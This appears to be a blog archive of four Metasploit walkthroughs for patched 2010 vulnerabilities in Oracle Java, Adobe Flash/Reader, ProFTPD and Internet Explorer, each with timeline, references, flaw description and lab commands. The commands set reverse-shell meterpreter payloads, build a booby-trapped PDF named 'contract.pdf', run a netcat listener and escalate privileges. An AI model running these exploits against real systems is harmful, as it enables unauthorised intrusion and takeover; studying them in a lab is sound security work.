Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2010-3552 : Oracle Java Runtime New Plugin docbase Buffer Overflow

Exploits, Metasploit,

Timeline :

Vulnerability discovered by Stephen Fewer and submitted to ZDI
Vulnerability reported to the vendor by ZDI the 2010-07-20
PoC provided by berendjanwever the 2010-08-31
Coordinated vulnerability disclosure the 2010-10-12
Metasploit PoC provided the 2010-10-25

PoC provided by :

jduck

Reference(s) :

CVE-2010-3552
ZDI-10-206

Affected version(s) :

All Oracle JRE versions previous version 6 update 22.

Tested on Windows XP SP3 with

Oracle JRE 6 Update 20

Description :

This module exploits a flaw in the new plugin component of the Sun Java Runtime Environment before v6 Update 22. By specifying specific parameters to the new plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary code. When the new plugin is invoked with a “launchjnlp” parameter, it will copy the contents of the “docbase” parameter to a stack-buffer using the “sprintf” function. A string of 396 bytes is enough to overflow the 256 byte stack buffer and overwrite some local variables as well as the saved return address. NOTE: The string being copied is first passed through the “WideCharToMultiByte”. Due to this, only characters which have a valid localized multibyte representation are allowed. Invalid characters will be replaced with question marks (‘?’). This vulnerability was originally discovered independently by both Stephen Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn’t been done, all versions since version 6 Update 10 are believed to be affected by this vulnerability. This vulnerability was patched as part of the October 2010 Oracle Patch release.

Commands :

use exploit/windows/browser/java_docbase_bof
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-3654 : Adobe Flash Player Button Remote Code Execution

Exploits, Metasploit, ,

PoC provided by :

Unknown
Haifei Li
jduck

Reference(s) :

CVE-2010-3654
APSA10-05

Affected version(s) :

Adobe Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
Adobe Flash Player 10.1.95.2 and earlier for Android
Adobe Reader 9.4 and earlier 9.x versions for Windows, Macintosh and UNIX*
Adobe Acrobat 9.4 and earlier 9.x versions for Windows and Macintosh

Tested on Windows XP SP3 with :

Acrobat Reader 9.4.0
Flash Player 10,0,42,34

Description :

This module exploits a vulnerability in the handling of certain SWF movies within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due a the hardcoded syscall number.

Commands :

use exploit/windows/fileformat/adobe_flashpl­ayer_button
set FILENAME contract.pdf
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
getuid
getsystem
shell

CVE-2010-3867 : ProFTPD IAC Remote Root Exploit

Exploits, Metasploit,

Timeline :

Vulnerability reported to vendor by ZDI the 2010-09-24
Coordinated public release of advisory the 2010-11-02
Metasploit exploit released the 2010-11-05
Exploit-DB exploit released the 2010-11-07

PoC provided by :

jduck for Metasploit exploit
Kingcope for Exploit-DB exploit

Reference(s) :

CVE-2010-3867
EDB-15449

Affected version(s) :

ProFTPD versions between 1.3.2rc3 and 1.3.3b

Tested on Debian Squeeze with :

ProFTPD proftpd-basic_1.3.3a-4_i386.deb

Description :

This module exploits a stack-based buffer overflow in versions of ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code.

Metasploit Demo :

use exploit/linux/ftp/proftp_telnet_iac
set RHOST 192.168.178.40
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid
ipconfig

Exploit-DB demo :

nc -lvn 45295
perl proftpd_iac.pl 192.168.178.40 192.168.178.21 5
id
uname -a
ifconfig

MS10-090 : Microsoft Internet Explorer CSS Tags Memory Corruption

Exploits, Metasploit,

PoC provided by :

unknown
Matteo Memelli
jduck

Reference(s) :

CVE-2010-3962
MSA-2458511
MS10-090

Affected version(s) :

Internet Explorer 6, 7 & 8

Tested on Windows XP SP3 with :

Internet Explorer 6 (mshtml.dll 6.0.2900.5512)

Description :

This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory corruption occurs that can lead arbitrary code execution. It seems like Microsoft code inadvertently increments a vtable pointer to point to an unaligned address within the vtable’s function pointers. This leads to the program counter being set to the address determined by the address “[vtable+0x30+1]”. The particular address depends on the exact version of the mshtml library in use. Since the address depends on the version of mshtml, some versions may not be exploitable. Specifically, those ending up with a program counter value within another module, in kernel space, or just not able to be reached with various memory spraying techniques. Also, since the address is not controllable, it is unlikely to be possible to use ROP to bypass non-executable memory protections.

Commands :

use exploit/windows/browser/ms10_xxx_ie_css_­clip
set SRVHOST 192.168.178.21
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
getsystem
shell